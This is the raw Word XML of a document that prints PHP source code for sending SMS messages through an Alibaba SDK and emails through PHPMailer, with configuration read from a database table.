    <w:p w14:paraId="1E9EEB9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onfig = Db::name('member_config')-&gt;where('type','sdkMobile')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C02C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Appkey=$config[0]['text'];</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="54739E7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SecretKey=$config[1]['text'];</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7293268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Qianming=$config[2]['text'];</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1239E7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Reg=$config[3]['tex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p>
    <w:p w14:paraId="5262C29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Pwd=$config[4]['text'];</w:t>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p>
    <w:p w14:paraId="31D0941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Mobile=$config[5]['text'];</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CD2F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 = new \TopClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9AE41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gt;appkey = $sdkAppkey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342C725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gt;secretKey = $sdkSecretKey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282C1BE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 = new \AlibabaAliqinFcSmsNumSendRequest;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F361BC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Extend('');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D516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SmsType('normal');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBFED7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SmsFreeSignName($sdkQianming);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4405245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SmsParam(json_encode($data['param']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145066C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RecNum($data['mobile']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8421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q-&gt;setSmsTemplateCode($data['template']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4715A8E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sult = $c-&gt;execute($req);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FDAE3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dump($result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331136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exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36768A6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sult = $this-&gt;_simplexml_to_array($result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA8881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isset($result['code'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687A42D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result['sub_code'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3563BDAD"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4E7061D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rue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4865BC8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01FEA84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rivate function _simplexml_to_array($obj)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218AF48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6AD3AA1F"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count($obj) &gt;= 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5532584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sult = $keys = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07708C2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foreach($obj as $key=&gt;$value){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BDAC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sset($keys[$key]) ? ($keys[$key] += 1) : ($keys[$key] = 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8F9FC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if( $keys[$key] == 1 ){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F0DFF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sult[$key] = $this-&gt;_simplexml_to_array($value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CC142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if( $keys[$key] == 2 ){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2E73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sult[$key] = [$result[$key], $this-&gt;_simplexml_to_array($value)];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1243C7"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lse if( $keys[$key] &gt; 2 ){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BF056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sult[$key][] = $this-&gt;_simplexml_to_array($value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503E3D2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7EBC854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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2152415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result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA1C8A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else if(count($obj) == 0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389C6A6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string)$obj;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AB4F2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3E07910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4353DD4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public function email($data=[]){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035C28C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lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>$validate = new Validate([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0194770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email','require|email','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱输入错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱输入错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A6947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content','require','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请输入邮件内容</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C99918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7A711BF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if (!$validate-&gt;check($data)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6049F15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r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>return $validate-&gt;getError();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBBD1E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337028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config = Db::name('member_config')-&gt;where('type','sdkEmail')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D7BFB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EmailHhost=$config[0]['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE390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EmailUsername=$config[1]['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7835D0F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dkEmailPwd=$config[2]['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439EC084"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title=config('config')['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4C5CB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vendor('phpmailer.phpmailer');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588D033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 = new \phpmailer(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C113B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hpmailer-&gt;Host</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">$sdkEmailHhost; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1D6EC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SMTPAuth </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">TRUE; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2F9D5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Username </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">$sdkEmailUsername; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB3CC61"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Password </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">$sdkEmailPwd; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB45A82"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From </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">$sdkEmailUsername; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4501330C"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FromName </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">$title; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A103D15"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hpmailer-&gt;CharSet</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">'utf-8'; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0433C8"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Subject </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">$title; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084361B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Body </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">$data['content']; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C096096"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AltBody </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">$data['content']; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECB1490"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WordWrap </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">50; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE0A96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hpmailer-&gt;IsSMTP(true);</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CF02F9"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 xml:space="preserve">$phpmailer-&gt;IsHTML(true); </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B1D34A"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phpmailer-&gt;AddAddress($data['email']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490386A3"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status = $phpmailer-&gt;Send();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2751035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r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>return true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FAF30E"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ab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4B4BFB" w14:textId="77777777"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169D73DC" w14:textId="10214B61" w:rsidR="00652339" w:rsidRPr="008320C6" w:rsidRDefault="00652339" w:rsidP="007C0EE1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="exact"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00652339" w:rsidRPr="008320C6" w:rsidSect="008320C6">
      <w:headerReference w:type="default" r:id="rId8"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1157" w:right="1440" w:bottom="1157"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739A" w14:textId="77777777" w:rsidR="00814E34" w:rsidRDefault="00814E34" w:rsidP="008320C6">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6F6572B1" w14:textId="77777777" w:rsidR="00814E34" w:rsidRDefault="00814E34" w:rsidP="0083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5942" w14:textId="77777777" w:rsidR="00814E34" w:rsidRDefault="00814E34" w:rsidP="008320C6">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="636EF959" w14:textId="77777777" w:rsidR="00814E34" w:rsidRDefault="00814E34" w:rsidP="0083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94724"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="3E59D292" w14:textId="0E575BAD" w:rsidR="00FA6346" w:rsidRDefault="00FA6346">
        <w:pPr>
          <w:pStyle w:val="a5"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:lang w:val="zh-CN"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="71FEFC77" w14:textId="77777777" w:rsidR="00FA6346" w:rsidRDefault="00FA63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56CDD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ED0A3AE6"/>
    <w:lvl w:ilvl="0" w:tplc="766801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14"/>
    <w:rsid w:val="005242CB"/>
    <w:rsid w:val="00652339"/>
    <w:rsid w:val="007C0EE1"/>
    <w:rsid w:val="00814E34"/>
    <w:rsid w:val="008320C6"/>
    <w:rsid w:val="00847914"/>
    <w:rsid w:val="00A54CE5"/>
    <w:rsid w:val="00FA6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8E9D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E5BD9A04-264D-4F20-94A9-B1FA75B5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2ED"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a4">
    <w:name w:val="纯文本 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a3"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="009E02ED"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00832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320C6"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008320C6"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a8">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="008320C6"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="line number"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0083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F9D9-90F0-4595-8D37-53A704DF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7</Pages>
  <Words>126685</Words>
  <Characters>722110</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>6017</Lines>
  <Paragraphs>1694</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>8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健</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>宋 健</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <cp:lastPrinted>2022-03-04T03:18:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-03-04T02:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-04T03:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>